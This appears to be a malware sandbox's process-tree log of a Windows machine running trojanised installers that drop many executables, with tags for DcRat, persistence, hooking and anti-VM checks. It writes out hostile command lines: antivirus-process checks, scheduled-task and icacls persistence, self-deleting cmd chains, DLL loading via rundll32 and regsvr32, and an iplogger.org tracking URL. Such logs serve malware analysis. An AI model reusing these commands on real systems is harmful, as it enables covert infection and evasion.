C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6364 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1588 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6132 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=102 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6088 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3028 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3564 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4900 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4264 /prefetch:82⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp1_rkfree_setup_301_password_123.zip\rkfree_setup_301_password_123.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_rkfree_setup_301_password_123.zip\rkfree_setup_301_password_123.exe"1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\rkfree_setup\rkfree_setup64.exe"C:\Users\Admin\AppData\Local\Temp\rkfree_setup\rkfree_setup64.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Checks computer location settings
- Drops file in System32 directory
- NTFS ADS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\rvlkl.exe"C:\Windows\system32\rvlkl.exe" -install -lang 93⤵
- Executes dropped EXE
-
C:\Windows\system32\rvlkl.exe"C:\Windows\system32\rvlkl.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Temp1_File.zip\Install.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_File.zip\Install.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\Q_al8h5yJr2pfKnyjDa7K4bP.exe"C:\Users\Admin\Pictures\Minor Policy\Q_al8h5yJr2pfKnyjDa7K4bP.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Users\Admin\Downloads\File\Install.exe"C:\Users\Admin\Downloads\File\Install.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\9ttTG63SaCJEubu9iGdOslGV.exe"C:\Users\Admin\Pictures\Minor Policy\9ttTG63SaCJEubu9iGdOslGV.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\robocopy.exerobocopy 89273873764872637456726738462763749829384862735682793849823849728343⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Interests.vss & ping -n 5 localhost3⤵
-
C:\Windows\SysWOW64\cmd.execmd4⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq AvastUI.exe"5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "avastui.exe"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq AVGUI.exe"5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "avgui.exe"5⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^fLEXoLsnFh$" Spa.vss5⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rehab.exe.pifRehab.exe.pif F5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\PING.EXEping -n 5 localhost4⤵
- Runs ping.exe
-
C:\Users\Admin\Pictures\Minor Policy\0ESIFYudXNYZaYrWCRa9HdY_.exe"C:\Users\Admin\Pictures\Minor Policy\0ESIFYudXNYZaYrWCRa9HdY_.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\8yRrDWZmXks9IvL_IS0nj_06.exe"C:\Users\Admin\Pictures\Minor Policy\8yRrDWZmXks9IvL_IS0nj_06.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" SnQV6I.A -s3⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Minor Policy\X70ItBxukSvymp13PgQhBSOh.exe"C:\Users\Admin\Pictures\Minor Policy\X70ItBxukSvymp13PgQhBSOh.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1944 -s 4283⤵
- Program crash
-
C:\Users\Admin\Pictures\Minor Policy\OtV01fNRpBSqIMPnvBIz_5U1.exe"C:\Users\Admin\Pictures\Minor Policy\OtV01fNRpBSqIMPnvBIz_5U1.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\OtV01fNRpBSqIMPnvBIz_5U1.exe"C:\Users\Admin\Pictures\Minor Policy\OtV01fNRpBSqIMPnvBIz_5U1.exe"3⤵
- DcRat
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\ece638ff-5062-40ce-bed5-d6d234b910ab" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
C:\Users\Admin\Pictures\Minor Policy\OtV01fNRpBSqIMPnvBIz_5U1.exe"C:\Users\Admin\Pictures\Minor Policy\OtV01fNRpBSqIMPnvBIz_5U1.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\OtV01fNRpBSqIMPnvBIz_5U1.exe"C:\Users\Admin\Pictures\Minor Policy\OtV01fNRpBSqIMPnvBIz_5U1.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
- Modifies extensions of user files
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\e6948d1b-41d4-4c56-96c1-ce2a0d9a933e\build2.exe"C:\Users\Admin\AppData\Local\e6948d1b-41d4-4c56-96c1-ce2a0d9a933e\build2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\e6948d1b-41d4-4c56-96c1-ce2a0d9a933e\build2.exe"C:\Users\Admin\AppData\Local\e6948d1b-41d4-4c56-96c1-ce2a0d9a933e\build2.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\e6948d1b-41d4-4c56-96c1-ce2a0d9a933e\build2.exe" & del C:\PrograData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\e6948d1b-41d4-4c56-96c1-ce2a0d9a933e\build3.exe"C:\Users\Admin\AppData\Local\e6948d1b-41d4-4c56-96c1-ce2a0d9a933e\build3.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\Hees5gyHhxQ9S2TKRxCAvjcm.exe"C:\Users\Admin\Pictures\Minor Policy\Hees5gyHhxQ9S2TKRxCAvjcm.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Minor Policy\Hees5gyHhxQ9S2TKRxCAvjcm.exe"C:\Users\Admin\Pictures\Minor Policy\Hees5gyHhxQ9S2TKRxCAvjcm.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\49AAFB727CL5GDI.exe"C:\Users\Admin\AppData\Local\Temp\49AAFB727CL5GDI.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\49AAFB727CL5GDI.exe"C:\Users\Admin\AppData\Local\Temp\49AAFB727CL5GDI.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\0M20GBJKA66FG9A.exe"C:\Users\Admin\AppData\Local\Temp\0M20GBJKA66FG9A.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\0M20GBJKA66FG9A.exe"C:\Users\Admin\AppData\Local\Temp\0M20GBJKA66FG9A.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\KBHKAC88D1F3HM2.exe"C:\Users\Admin\AppData\Local\Temp\KBHKAC88D1F3HM2.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\KBHKAC88D1F3HM2.exe"C:\Users\Admin\AppData\Local\Temp\KBHKAC88D1F3HM2.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C start C:\Windows\Temp\xsv.exe6⤵
-
C:\Windows\Temp\xsv.exeC:\Windows\Temp\xsv.exe7⤵
- DcRat
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\MID2G1BELCG7H55.exe"C:\Users\Admin\AppData\Local\Temp\MID2G1BELCG7H55.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" SnQV6I.A -s5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\KD005C2835911EG.exehttps://iplogger.org/1x5az74⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\qkftJGDPHrj6GpoYfaz9kGzw.exe"C:\Users\Admin\Pictures\Minor Policy\qkftJGDPHrj6GpoYfaz9kGzw.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"3⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\cNqK1rl2lwvcIXjaMDuEDhDV.exe"C:\Users\Admin\Pictures\Minor Policy\cNqK1rl2lwvcIXjaMDuEDhDV.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\jR5Q7PgDKXRyFifhSjYEWAo0.exe"C:\Users\Admin\Pictures\Minor Policy\jR5Q7PgDKXRyFifhSjYEWAo0.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-2BJT4.tmp\jR5Q7PgDKXRyFifhSjYEWAo0.tmp"C:\Users\Admin\AppData\Local\Temp\is-2BJT4.tmp\jR5Q7PgDKXRyFifhSjYEWAo0.tmp" /SL5="$2026C,3267745,979456,C:\Users\Admin\Pictures\Minor Policy\jR5Q7PgDKXRyFifhSjYEWAo0.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\java.exe"C:\Users\Admin\AppData\Roaming\java.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"5⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"6⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Yandex\YaAddon\23ad3aa1\filezilla.exe"C:\Users\Admin\AppData\Local\Yandex\YaAddon\23ad3aa1\filezilla.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"8⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\system32\svchost.exe"9⤵
- Loads dropped DLL
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
-
C:\Users\Admin\Pictures\Minor Policy\1GPK0P7aXVq71TQv22DqyPmM.exe"C:\Users\Admin\Pictures\Minor Policy\1GPK0P7aXVq71TQv22DqyPmM.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\All rights (c)2020-2021 Jonathan Bennett & AutoIt\Autov5\AutoIt v5 Setup\dllhusts.exe"C:\ProgramData\All rights (c)2020-2021 Jonathan Bennett & AutoIt\Autov5\AutoIt v5 Setup\dllhusts.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\ProgramData\All rights (c)2020-2021 Jonathan Bennett & AutoIt\Autov5\AutoIt v5 Setup\dllhusts.exe"C:\ProgramData\All rights (c)2020-2021 Jonathan Bennett & AutoIt\Autov5\AutoIt v5 Setup\dllhusts.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "dllhusts.exe" /f & erase "C:\ProgramData\All rights (c)2020-2021 Jonathan Bennett & AutoIt\Autov5\AutoIt v5 Setup\dllhusts.exe" & exit5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "dllhusts.exe" /f6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Minor Policy\rd1hX32qxbTEj_w1iCuwV_j3.exe"C:\Users\Admin\Pictures\Minor Policy\rd1hX32qxbTEj_w1iCuwV_j3.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\iZr04NHQo2wt4BXC1sIRm5E6.exe"C:\Users\Admin\Pictures\Minor Policy\iZr04NHQo2wt4BXC1sIRm5E6.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\vqaxOmEozavyS1F_VZNHcPSf.exe"C:\Users\Admin\Pictures\Minor Policy\vqaxOmEozavyS1F_VZNHcPSf.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Minor Policy\tW7Y0_b8aGCZGB9K4Cnu3Izl.exe"C:\Users\Admin\Pictures\Minor Policy\tW7Y0_b8aGCZGB9K4Cnu3Izl.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Minor Policy\Mmwt5y3s3zj3YZRq2H7QWLkZ.exe"C:\Users\Admin\Pictures\Minor Policy\Mmwt5y3s3zj3YZRq2H7QWLkZ.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Minor Policy\VFAG5UfCz7e3IdvdI8v01u_M.exe"C:\Users\Admin\Pictures\Minor Policy\VFAG5UfCz7e3IdvdI8v01u_M.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\nIS_6lAPkuiAD1vGQNmAscKo.exe"C:\Users\Admin\Pictures\Minor Policy\nIS_6lAPkuiAD1vGQNmAscKo.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Updater.exe"C:\Users\Admin\AppData\Local\Temp\Updater.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\epJtHFnMJr1xk7GmIRKBf6e5.exe"C:\Users\Admin\Pictures\Minor Policy\epJtHFnMJr1xk7GmIRKBf6e5.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\epJtHFnMJr1xk7GmIRKBf6e5.exe"C:\Users\Admin\Pictures\Minor Policy\epJtHFnMJr1xk7GmIRKBf6e5.exe" -h3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\SpCSbJF2gtnaYf15VB7gkWOO.exe"C:\Users\Admin\Pictures\Minor Policy\SpCSbJF2gtnaYf15VB7gkWOO.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Downloads\File\Install.exe"C:\Users\Admin\Downloads\File\Install.exe"1⤵
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\mRs1315_U1bIiV5F6j7EgWjc.exe"C:\Users\Admin\Pictures\Minor Policy\mRs1315_U1bIiV5F6j7EgWjc.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Downloads\File\Install.exe"C:\Users\Admin\Downloads\File\Install.exe"1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\he1ZfC3bR4eCfnDzT1OlvgXI.exe"C:\Users\Admin\Pictures\Minor Policy\he1ZfC3bR4eCfnDzT1OlvgXI.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Downloads\File\Install.exe"C:\Users\Admin\Downloads\File\Install.exe"1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\uEu3BlPDRxDD3lXheMCJwF3k.exe"C:\Users\Admin\Pictures\Minor Policy\uEu3BlPDRxDD3lXheMCJwF3k.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 1944 -ip 19441⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6496 -s 6003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 6496 -ip 64961⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\E01D.exeC:\Users\Admin\AppData\Local\Temp\E01D.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\DA6.dll1⤵
-
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\DA6.dll2⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\80E3.exeC:\Users\Admin\AppData\Local\Temp\80E3.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11976 -s 3402⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\8B35.exeC:\Users\Admin\AppData\Local\Temp\8B35.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 11996 -s 4242⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 428 -p 11996 -ip 119961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 11976 -ip 119761⤵
-
C:\Users\Admin\AppData\Local\Temp\9BFF.exeC:\Users\Admin\AppData\Local\Temp\9BFF.exe1⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\9BFF.exe"C:\Users\Admin\AppData\Local\Temp\9BFF.exe" -h2⤵
- Executes dropped EXE
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12372 -s 6003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 12372 -ip 123721⤵
-
C:\Users\Admin\AppData\Local\Temp\AA09.exeC:\Users\Admin\AppData\Local\Temp\AA09.exe1⤵
